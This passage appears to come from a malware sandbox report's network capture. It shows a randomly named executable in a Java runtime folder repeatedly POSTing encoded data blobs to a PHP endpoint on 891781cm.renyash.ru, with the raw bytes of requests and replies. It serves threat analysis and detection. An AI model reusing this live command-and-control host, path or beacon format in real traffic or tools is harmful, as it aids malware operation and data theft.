                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4883&min_rtt=1943&rtt_var=6610&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=57324&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
58          192.168.2.4  49799        104.21.38.84    80                7448  C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 15:02:52.857002974 CET  320                OUT        POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
Jan 1, 2025 15:02:53.212740898 CET  1072               OUT        Data Raw: 50 53 58 52 5a 5d 51 5b 55 5a 54 59 51 52 55 5c 58 5d 5c 58 59 57 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PSXRZ]Q[UZTYQRU\X]\XYWR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(&#+.1.=. '$-:?3&'/$/.$\?><V(,#^!'^)
Jan 1, 2025 15:02:53.320554972 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 15:02:53.590933084 CET  804                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HGwbLOoHa0w2H2HwTuSUTfoxYK91Pr64IK55QyqO30nBnbphGd4YnLiNyB3fHAlN8X5iV9ANqICj7rhLhKPCJro8x2m1FXNBhMPl7B4cbjdq%2BOCTyP8mMAuVOgpMD606g%2Fa%2BoUgH"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cb2f992c34f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3373&min_rtt=1698&rtt_var=3987&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=96695&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
59          192.168.2.4  49801        104.21.38.84    80                7448  C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 15:02:53.721311092 CET  344                OUT        POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:54.071768999 CET  1072               OUT        Data Raw: 50 52 58 52 5f 5d 54 5e 55 5a 54 59 51 5c 55 54 58 52 5c 55 59 5c 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PRXR_]T^UZTYQ\UTXR\UY\R_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^</%#]!%*>(0V980>V'+,><>$V*,#^!'^)
Jan 1, 2025 15:02:54.194719076 CET  25                 IN         HTTP/1.1 100 Continue
Jan 1, 2025 15:02:54.458345890 CET  801                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pilyxe2im3KYIu32Rzf7m1wAKZvPuPNbRaTRYQrqda0omNXoqM7mPNyE1xysUZngrL0VsKGvzCcaOdfzwBL4hShkOC6who6dy1v78ZbAIs7IPrfTjuuqMDqB0M%2BieZoBdO0PhqcK"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cb86ca20f51-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2838&min_rtt=1575&rtt_var=3118&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=124946&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
60          192.168.2.4  49802        104.21.38.84    80                7448  C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 1, 2025 15:02:54.592762947 CET  344                OUT        POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:54.946846962 CET | 1072 | OUT | Data Raw: 55 5e 5d 53 5f 5a 54 5f 55 5a 54 59 51 5d 55 5c 58 58 5c 58 59 56 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^]S_ZT_UZTYQ]U\XX\XYVRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]?X#=Y&Z>+Y0'&W,$$!0,[<=$>#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:55.052489042 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:55.313879967 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RGkQn%2FPtsWHR4a5OCZ313IDUUfWTXgxNp6rJLuJAny4rQ9MoZq%2F%2BsiWYAt8OeREvgQoyFTLlBiFvy4mGN6l%2FucTZVHnnimaY4cgA2lHdoBe7yQjNC6Yw9tDnpL2B8lguTJRy0y2%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cbdc82a8c83-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3716&min_rtt=1997&rtt_var=4188&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=92674&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  61 | 192.168.2.4 | 49804 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:55.450772047 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:55.806443930 CET | 1072 | OUT | Data Raw: 55 51 58 57 5f 5c 51 5e 55 5a 54 59 51 58 55 5c 58 5a 5c 59 59 57 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQXW_\Q^UZTYQXU\XZ\YYWRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ _+"4;-Y2>)Y>>$4Q,7 ^'53,;^/(^<.4=#^!'^)+
                                                                                                                  Jan 1, 2025 15:02:55.905267000 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:56.171566010 CET | 817 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bfsmd3WHvj%2Forc8q2Z5ft1OISeIEKifLV7srzPtgbuBzbzI6UIKwf2d8%2F78dKB%2FAHAe3vI7gZa%2FEcllTCqmDZNhhxutD9Hugx1lw%2Bi%2By%2B1zpzVGkbwcw9zWdezHuq2NEQ9%2BNsYrP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cc3180c8c1b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=9070&min_rtt=2738&rtt_var=13690&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=27343&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  62 | 192.168.2.4 | 49810 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:56.294423103 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:56.649919987 CET | 1072 | OUT | Data Raw: 55 57 5d 51 5a 58 51 5f 55 5a 54 59 51 5c 55 55 58 5c 5c 5f 59 53 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]QZXQ_UZTYQ\UUX\\_YSRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ](/%\4;%[%>+[$"W.'$^',"'#Y8_+$R(<#^!'^)
                                                                                                                  Jan 1, 2025 15:02:56.737859011 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:56.912230015 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OZn57GN3Bw8pxSf3AbPUZeZwdE1nWgS1WmHYWR23O7S3L%2FKiIORNBjRoP1GQKv0AoECez3gsSEde%2BZNvM1FiOPaoh0qpFiW%2BnIjZVzevRBqBinKkVcUrq3OD3TQrRZx%2FS4wrmdKt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cc85f6a42b0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2231&min_rtt=1786&rtt_var=1561&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=272846&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  63 | 192.168.2.4 | 49815 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:57.043950081 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:57.404722929 CET | 1072 | OUT | Data Raw: 55 54 5d 53 5a 5a 54 5a 55 5a 54 59 51 5d 55 55 58 5a 5c 5c 59 5d 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UT]SZZTZUZTYQ]UUXZ\\Y]RX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(?2 Y2>!Y>X?Y':.$8X$Y"Q$?,,> ^<4(<#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:57.488173962 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  64 | 192.168.2.4 | 49817 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:57.610253096 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:57.962969065 CET | 1796 | OUT | Data Raw: 55 54 58 50 5a 57 54 5d 55 5a 54 59 51 5f 55 53 58 59 5c 5c 59 5c 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXPZWT]UZTYQ_USXY\\Y\R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y+?\4:$.\)$71-$-3<;Y/X$]?.4V*,#^!'^)7
                                                                                                                  Jan 1, 2025 15:02:58.063896894 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:58.340087891 CET | 952 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHKBElEsKL5fMLRt%2BuFcrbDO2gTg2IyLMVOCkPT7QckRGP2wQEikmKzuIq1cP0jDl%2FYCLB1EDBEXbYUI4iFAQ4boGj6qd8iEFH9sTPe2WBqg6fHgvfgDckf0AgTG2WX87GvcxV0P"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cd09bbc41f8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7807&min_rtt=1636&rtt_var=12956&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=28624&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 51 27 05 23 14 28 07 29 00 3b 11 27 1f 25 3c 26 5e 27 0e 0a 5b 26 2e 1b 5d 2f 38 2b 02 3e 3b 37 5e 26 5c 2e 01 20 31 2d 00 31 26 2e 5d 04 1d 26 02 29 04 25 01 3f 01 31 58 29 32 0e 5d 27 24 28 03 32 0a 0d 02 30 3e 31 01 22 1c 01 1d 27 0d 3f 0e 28 17 3c 07 24 03 08 56 21 2a 2e 57 0d 12 21 0e 25 00 13 11 3d 0f 20 52 20 2f 23 57 25 3f 05 1c 24 2c 20 12 37 06 32 10 3e 06 20 11 36 37 29 1f 24 04 0d 5e 22 3a 39 13 23 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"Q'#();'%<&^'[&.]/8+>;7^&\. 1-1&.]&)%?1X)2]'$(20>1"'?(<$V!*.W!%= R /#W%?$, 72> 67)$^":9#3"T /T=VO0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  65 | 192.168.2.4 | 49818 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:57.736423016 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:58.087512016 CET | 1072 | OUT | Data Raw: 50 56 58 51 5f 59 51 59 55 5a 54 59 51 5a 55 5c 58 52 5c 5d 59 5c 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXQ_YQYUZTYQZU\XR\]Y\R^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \+<17;-1.>X30$.V-3$Z'Z->+?>$=#^!'^)#
                                                                                                                  Jan 1, 2025 15:02:58.189572096 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:58.454675913 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ivuSUSgTwjDMPJ0SVCYrIvb3gMlG4b42eFZFu%2BOcIXAIHw3rz0%2BcKmuU32HByvHMAcsnIzdFM71dxHd%2FT0XxgiMNSMw%2BwfaTC4tDZ4eANNkhsL%2BLnqM76YPe9aEfHDj4jLnR0%2Fp4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cd16977436f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7796&min_rtt=1750&rtt_var=12749&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=29128&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  66 | 192.168.2.4 | 49826 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:58.593240023 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:58.947052002 CET | 1072 | OUT | Data Raw: 55 57 58 5d 5a 5b 54 5a 55 5a 54 59 51 59 55 55 58 52 5c 54 59 53 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWX]Z[TZUZTYQYUUXR\TYSRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ <.#;&1.>(=#'':Q.$;3Y"T0<8/>7(=<=<#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:59.051121950 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:59.312905073 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OsWa1sq%2FUpeWd8k8xV%2F7C0qDnJjaZp9Mm6yNTigU2lwmTc3cuuRPmKcn2cEdzWdhYo7rWb2WbutoolHt3wEg4Ho2qn6gopZEr539tKmE8xaSeiKlG7gLNhydyUg%2BACh0L0g%2FBdus"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cd6c98fc47a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
